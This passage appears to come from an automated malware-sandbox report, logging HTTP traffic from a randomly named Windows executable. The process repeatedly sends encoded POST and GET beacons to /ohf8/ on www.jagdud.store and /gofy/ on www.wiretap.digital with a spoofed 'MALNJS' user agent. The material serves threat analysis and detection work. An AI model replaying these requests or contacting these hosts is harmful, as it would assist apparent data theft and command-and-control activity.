                                                                                                                                                                            Dec 11, 2024 09:40:55.872608900 CET85INData Raw: 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 22 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d
                                                                                                                                                                            Data Ascii: 999px;" alt=""></div></noscript>... /Yandex.Metrika counter --></body></html>0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            13192.168.2.550069209.74.64.187804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:01.580017090 CET804OUTPOST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 57 31 43 42 6f 54 68 4a 65 74 39 4c 52 4b 6f 37 48 76 43 4b 37 4c 54 63 2f 38 76 4d 4d 52 71 49 7a 34 68 4c 39 2b 39 61 76 56 49 45 73 67 42 6c 75 6c 2b 6f 39 6e 59 35 4b 6a 4a 66 6b 49 69 6c 77 38 74 39 53 49 6f 2b 42 4b 6f 57 31 30 4d 68 41 6a 4e 6a 5a 47 35 74 43 67 34 71 7a 65 52 6d 73 6c 37 71 45 56 71 71 65 71 7a 51 79 66 36 50 76 6a 57 77 2f 58 4e 5a 6d 30 76 57 6e 56 38 77 2f 55 44 37 73 79 63 49 6d 63 4a 77 42 52 72 62 34 61 62 73 69 42 50 6e 30 63 53 4a 34 45 55 6a 73 73 63 37 49 4d 43 78 74 4e 30 54 45 65 74 72 37 53 2b 72 45 41 54 6f 53 75 67 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=onR9AvgxrVBHW1CBoThJet9LRKo7HvCK7LTc/8vMMRqIz4hL9+9avVIEsgBlul+o9nY5KjJfkIilw8t9SIo+BKoW10MhAjNjZG5tCg4qzeRmsl7qEVqqeqzQyf6PvjWw/XNZm0vWnV8w/UD7sycImcJwBRrb4absiBPn0cSJ4EUjssc7IMCxtN0TEetr7S+rEAToSug=
                                                                                                                                                                            Dec 11, 2024 09:41:02.787748098 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:02 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            14192.168.2.550075209.74.64.187804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:04.332432985 CET824OUTPOST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 4f 49 7a 5a 78 4c 76 71 52 61 2f 46 49 45 34 51 42 73 67 46 2b 76 39 6e 63 48 4b 6d 78 66 6b 49 6d 6c 77 39 64 39 53 62 77 39 44 61 6f 59 30 45 4d 6a 64 7a 4e 6a 5a 47 35 74 43 67 63 51 7a 61 31 6d 72 55 4c 71 45 77 4b 70 64 71 7a 58 6d 50 36 50 72 6a 58 35 2f 58 4e 2f 6d 31 7a 77 6e 54 77 77 2f 56 7a 37 73 67 30 4c 73 63 4a 79 50 78 71 74 2b 71 32 45 6b 51 33 59 2f 4d 2f 62 6b 6d 74 64 74 61 74 52 53 75 4b 5a 2b 74 59 72 55 4e 6c 63 71 69 66 43 65 6a 44 59 4d 35 33 72 6d 4b 71 7a 51 61 58 30 32 45 59 44 32 6b 37 4a 73 44 6e 33
                                                                                                                                                                            Data Ascii: x6lPJLCP=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiOIzZxLvqRa/FIE4QBsgF+v9ncHKmxfkImlw9d9Sbw9DaoY0EMjdzNjZG5tCgcQza1mrULqEwKpdqzXmP6PrjX5/XN/m1zwnTww/Vz7sg0LscJyPxqt+q2EkQ3Y/M/bkmtdtatRSuKZ+tYrUNlcqifCejDYM53rmKqzQaX02EYD2k7JsDn3
                                                                                                                                                                            Dec 11, 2024 09:41:05.540657043 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:05 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            15192.168.2.550081209.74.64.187804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:07.254709959 CET1745OUTPOST /ohf8/ HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.jagdud.store
                                                                                                                                                                            Referer: http://www.jagdud.store/ohf8/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 47 49 7a 70 74 4c 39 62 52 61 38 46 49 45 6b 41 42 70 67 46 2f 7a 39 6e 6b 4c 4b 6d 4d 6f 6b 4e 36 6c 78 66 6c 39 44 36 77 39 4b 61 6f 59 78 30 4d 67 41 6a 4e 32 5a 47 70 70 43 67 73 51 7a 61 31 6d 72 57 54 71 4e 46 71 70 62 71 7a 51 79 66 36 4c 76 6a 58 56 2f 58 55 4b 6d 31 48 47 6e 6a 51 77 2b 31 6a 37 2f 44 63 4c 67 63 4a 30 61 78 71 6c 2b 71 36 62 6b 52 61 70 2f 4f 65 4f 6b 6c 39 64 73 66 77 39 42 4e 57 45 69 37 41 39 58 66 59 39 37 55 54 42 51 42 79 33 45 34 37 35 6b 4b 2f 62 59 63 58 62 32 48 5a 51 71 77 54 37 74 46 62 2b 4e 6b 7a 53 35 34 64 6f 79 45 49 62 4c 6a 35 34 57 7a 6d 44 72 7a 41 32 32 64 74 71 72 54 61 35 5a 52 65 77 39 44 75 4c 4a 42 36 51 6d 71 2b 69 47 37 30 50 6e 35 43 2f 62 42 6b 4c 77 38 39 33 6a 51 66 6a 63 5a 73 6a 6e 4a 63 70 74 4d 73 58 59 77 6c 67 43 6d 6f 64 66 51 6e 62 70 64 54 44 4d 71 49 49 36 70 64 6e 76 48 51 62 79 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiGIzptL9bRa8FIEkABpgF/z9nkLKmMokN6lxfl9D6w9KaoYx0MgAjN2ZGppCgsQza1mrWTqNFqpbqzQyf6LvjXV/XUKm1HGnjQw+1j7/DcLgcJ0axql+q6bkRap/OeOkl9dsfw9BNWEi7A9XfY97UTBQBy3E475kK/bYcXb2HZQqwT7tFb+NkzS54doyEIbLj54WzmDrzA22dtqrTa5ZRew9DuLJB6Qmq+iG70Pn5C/bBkLw893jQfjcZsjnJcptMsXYwlgCmodfQnbpdTDMqII6pdnvHQbycXtmMw/CjwmIa0fMYRvg50BPP2WnPwTCuoKb1N4VLxB8RVE4oSzTxbgwWPFT5vFyHnZJLq2C3J+1l5mYHypcNorH2RQc13tQh7o0JCwcu3Zqkxm91vacmEoRvGKpN6DE6F99KP5Ra8n19gCrkZrBbjZ32joDFYLd08tY+ADJ5Lk4LDaf91JtCwKssCT4kiESIIhq8TG0btEhQrEM/L8iQiIGSKgu8u9vkiuQe3y0NHJ7QNRTa1mit6SHBqIOkbnGmfUQUilLNfiKsOH6XRcG7yCUsQovA2EGubYFE/9nMjE0XrhemAYzjIXfYLNZFyfIJpeIwC5E9JlroVHRmr7zJy3ZjaXgSFQnvX5Z+1U4iBleFQuXsM+WrCoOlde4HMWC1zUYeQ3mpvdVhMTHl/IRBhzhV+LLCcEZS6/JHoqMRCK4OhtRN9Y4KW6LLS3JcJLV7QFcwxNSo2ql0wYNwY4n1chSDclhsQ50THEpTC3QTLubdn3PHX9VdXiIafoj8HzoZQ7isZuWokp7b/ZjdVYsMe/08COKzA1X9978xalRqPTBBcVRE9YIC+ZeRO9kwqUyfGCU6E2iLma1RmVLK9rpqJtoz8j/NcfYBZ1HxVy7suBu0JrgLQdfYc4v8pY8pgW78sPgOjFHw/KNHsrWWsTjZyxHZF+yNOt2S1 [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:41:08.513253927 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:08 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            16192.168.2.550087209.74.64.187804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:09.919754028 CET548OUTGET /ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.jagdud.store
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:41:11.128878117 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:41:10 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            17192.168.2.5501033.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:17.003994942 CET813OUTPOST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 52 67 51 6e 75 30 71 31 57 39 50 69 57 50 51 5a 57 50 61 4c 51 57 2b 6f 6f 59 6a 6b 48 47 4e 72 68 79 50 71 30 46 72 50 7a 4f 76 79 62 59 5a 66 41 6e 45 31 55 64 73 30 54 6e 46 62 55 38 51 30 70 33 54 63 53 73 34 5a 4c 79 6f 6a 30 67 6e 66 69 36 34 65 6e 6d 52 75 34 2b 37 38 49 48 65 62 77 2b 53 7a 42 34 68 43 45 42 6c 78 39 49 51 76 50 4e 53 4a 65 53 30 54 43 6b 45 48 47 37 31 4f 6e 6f 35 2f 73 65 63 4e 35 47 39 6e 65 34 56 4f 6e 53 59 62 34 43 49 6b 2f 6a 69 34 68 4b 30 41 76 49 52 4c 61 7a 65 50 4b 34 6d 4f 34 4e 63 61 78 47 51 70 55 36 51 31 41 50 31 57 4d 63 59 6e 5a 4b 30 38 38 45 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=3RgQnu0q1W9PiWPQZWPaLQW+ooYjkHGNrhyPq0FrPzOvybYZfAnE1Uds0TnFbU8Q0p3TcSs4ZLyoj0gnfi64enmRu4+78IHebw+SzB4hCEBlx9IQvPNSJeS0TCkEHG71Ono5/secN5G9ne4VOnSYb4CIk/ji4hK0AvIRLazePK4mO4NcaxGQpU6Q1AP1WMcYnZK088E=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            18192.168.2.5501043.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:19.676856995 CET833OUTPOST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 52 67 51 6e 75 30 71 31 57 39 50 68 33 2f 51 65 46 6e 61 4e 77 57 78 6e 49 59 6a 76 6e 47 42 72 68 4f 50 71 78 67 75 50 41 71 76 79 37 6f 5a 65 42 6e 45 6d 6b 64 73 38 7a 6e 41 46 6b 39 65 30 70 37 68 63 51 34 34 5a 4c 4f 6f 6a 32 6f 6e 65 56 75 6e 66 33 6d 54 6a 59 2b 35 6b 6f 48 65 62 77 2b 53 7a 42 38 48 43 41 56 6c 79 4a 30 51 67 4f 4e 52 44 2b 53 37 53 43 6b 45 4e 6d 37 70 4f 6e 6f 4c 2f 74 44 37 4e 2f 43 39 6e 62 38 56 4f 32 53 62 4f 49 43 47 35 50 69 75 32 7a 72 4d 4e 63 51 4c 55 72 32 38 50 4d 49 50 50 4f 38 32 41 54 4f 34 36 30 57 6f 6c 54 48 43 48 38 39 78 39 36 61 45 69 72 51 63 30 32 5a 42 66 56 65 75 79 6d 64 6b 49 33 42 6d 73 34 46 6c
                                                                                                                                                                            Data Ascii: x6lPJLCP=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAqvy7oZeBnEmkds8znAFk9e0p7hcQ44ZLOoj2oneVunf3mTjY+5koHebw+SzB8HCAVlyJ0QgONRD+S7SCkENm7pOnoL/tD7N/C9nb8VO2SbOICG5Piu2zrMNcQLUr28PMIPPO82ATO460WolTHCH89x96aEirQc02ZBfVeuymdkI3Bms4Fl
                                                                                                                                                                            Dec 11, 2024 09:41:20.760881901 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            19192.168.2.5501053.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:22.343019009 CET1754OUTPOST /gofy/ HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.wiretap.digital
                                                                                                                                                                            Referer: http://www.wiretap.digital/gofy/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
